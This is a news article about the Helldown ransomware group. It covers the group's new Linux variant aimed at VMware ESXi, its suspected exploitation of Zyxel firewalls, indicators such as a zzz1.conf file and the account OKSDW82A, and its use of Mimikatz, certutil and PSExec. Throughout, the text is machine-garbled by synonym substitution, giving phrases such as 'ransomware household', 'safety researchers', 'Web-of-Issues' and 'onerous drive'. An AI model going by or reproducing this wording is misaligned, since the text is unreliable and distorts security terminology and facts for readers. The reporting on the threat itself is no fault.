The purveyor of a quickly rising ransomware household being tracked as “Helldown” launched a brand new Linux variant, focusing on organizations throughout a number of sectors utilizing VMware ESXi servers.
A number of of the victims had Zyxel firewalls deployed as IPSec VPN entry factors on the time of breach, suggesting the attackers exploited a vulnerability or vulnerabilities within the know-how to achieve preliminary entry, safety researchers at Sekoia reported this week. Since surfacing in August, the group behind Helldown has rapidly notched 31 victims, lots of them US-based.
Undocumented Zyxel Vulnerabilities?
Obtainable telemetry suggests the Zyxel flaw that the attackers are exploiting is undocumented, Seokia stated. However Zyxel has issued fixes for a number of vulnerabilities in its firewalls after Helldown actors breached the corporate’s community, additionally in August, after which leaked some 250GB price of knowledge. As of mid-November, no exploit code for any of those vulnerabilities seems to be publicly obtainable, Sekoia stated, whereas leaving open the likelihood that the Helldown attackers could possibly be exploiting any one of many vulnerabilities.
“Helldown is a notably energetic new intrusion set, as proven by its giant variety of victims,” Sekoia researcher Jeremy Scion wrote this week. “Obtainable knowledge signifies that the group primarily targets Zyxel firewalls by exploiting undocumented vulnerabilities.” Although the ransomware itself is normal fare, what makes the group harmful is its obvious entry to and efficient use of undocumented vulnerability code, Scion famous.
Zyxel firewalls, like many different community and edge applied sciences, are a well-liked attacker goal. Risk actors have been fast to take advantage of flaws within the firm’s merchandise in varied campaigns prior to now, together with one dubbed IZ1H9 that focused Web-of-Issues (IoT) networks; one other involving a Mirai variant; and one other that hit Danish important infrastructure.
A Troubling Shift
Patrick Tiquet, vp safety and structure at Keeper Safety, seen Helldown as a troubling shift in ransomware actor techniques. “Whereas ransomware focusing on Linux is not unprecedented, Helldown’s give attention to VMware programs exhibits its operators are evolving to disrupt the virtualized infrastructures many companies depend on,” he stated by way of e-mail. “The message to safety groups is obvious: patch identified vulnerabilities, monitor for uncommon exercise, and deal with virtualized environments with the identical vigilance as conventional ones.”
A number of safety distributors have reported assaults involving Helldown since early August. Most of its victims have been small and medium sized companies throughout totally different sectors, together with transportation, manufacturing, healthcare, telecommunications, and IT providers. Halycon, one of many first to identify Helldown, described the group as “extremely aggressive” and able to inflicting substantial disruption and monetary losses to victims. Based on Halycon, Helldown actors have a penchant for stealing giant volumes of knowledge from victims and threatening to leak the info except it receives a ransom.
In a report earlier this month, Truesec perceived the menace actor as being extra refined in its preliminary compromise strategies in comparison with higher identified ransomware operators, such because the one behind Akira. Within the assaults that Truesec analyzed, Helldown menace actors leveraged respectable instruments and different living-off-the-land strategies to execute their mission on a compromised community.
Harmful Adversary
“Current incidents confirmed that the group will totally take away instruments utilized throughout a compromise, in addition to override the free disk house on the onerous drive of various machines, in makes an attempt to hinder the restoration course of and cut back the effectiveness of file carving,” Trusec noticed. Helldown actors possible accessed sufferer environments straight from their Web-facing Zyxel firewall, the safety vendor posited. As soon as on a sufferer community, the menace actor used both TeamViewer or the default Home windows RDP consumer for lateral motion, PowerShell for distant code execution, and Mimikatz to seek for and retrieve credentials.
Based on Sekoia, reviews from a number of Helldown victims point out that the attacker compromised Zyxel firewalls operating firmware model 5.38. “Particularly, a file named zzz1.conf was uploaded, and a person account known as OKSDW82A was created” on compromised programs, Scion famous. The attacker then used the short-term account to create an SSL VPN tunnel for accessing and pivoting additional into the sufferer community.
The assault chain included makes an attempt by the menace actor to disable endpoint detection mechanisms utilizing a device known as HRSword; leverage the area controller’s LDAP credentials to burrow deeper into the community; use certutil to obtain Superior Port Scanner; use RDP or TeamViewer for distant entry and lateral motion; and use PSExec for distant code execution.
Scion stated Sekoia’s evaluation of the recordsdata that Helldown actors have printed on their knowledge leak web site confirmed lots of them to be unusually giant and averaging round 70GB. The largest file, the truth is, weighed in at a hefty 431GB, which is noteworthy as a result of ransomware actors sometimes are usually extra selective within the recordsdata they steal and use for extortion. The contents of the stolen recordsdata additionally tended to be extra variable and random than traditional for a ransomware operation. “The big quantity and number of knowledge recommend that the attacker doesn’t selectively select which paperwork to steal,” Scion stated. “As an alternative, they seem to focus on knowledge sources that retailer administrative recordsdata, reminiscent of PDFs and doc scans, which generally include delicate data (private, monetary, and so forth.), thereby intensifying the stress on victims.”
Helldown’s habits itself is just like that of Darkrace, a LockBit variant that first surfaced in August 2023 and will have been rebranded as Donex in February of this yr. Although the hyperlinks between the ransomware strains are usually not conclusive, there’s a chance that Helldown is a rebrand of Donex, Sekoia stated.